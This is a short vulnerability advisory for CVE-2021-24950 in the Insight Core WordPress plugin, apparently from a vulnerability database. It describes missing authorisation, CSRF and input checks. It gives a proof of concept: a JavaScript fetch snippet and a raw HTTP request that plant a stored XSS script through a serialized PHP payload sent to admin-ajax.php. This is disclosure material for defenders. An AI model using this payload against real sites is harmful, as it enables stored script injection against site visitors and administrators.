Insight Core <= 1.0 – Subscriber+ PHP Object Injection & Stored XSS | CVE 2021-24950

Description

The plugin does not have any authorisation and CSRF checks in the insight_customizer_options_import (available to any authenticated user), does not validate user input before passing it to unserialize(), nor sanitise and escape it before outputting it in the response. As a result, it could allow users with a role as low as Subscriber to perform PHP Object Injection, as well as Stored Cross-Site Scripting attacks

Proof of Concept

let formData = new FormData;
formData.append('import-file', new Blob(['a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}']))
formData.append('action', 'insight_customizer_options_import');
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "body": formData,
  "method": "POST"
})
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------189498983625966260651015514771
Content-Length: 458
Connection: close
Cookie: [any authenticated user]

-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="import-file"; filename="blob"
Content-Type: application/octet-stream

a:1:{s:16:"background_color";s:34:"</style><script>alert(/XSS/);</script>";}
-----------------------------189498983625966260651015514771
Content-Disposition: form-data; name="action"

insight_customizer_options_import
-----------------------------189498983625966260651015514771--


The XSS will be triggered in all frontend pages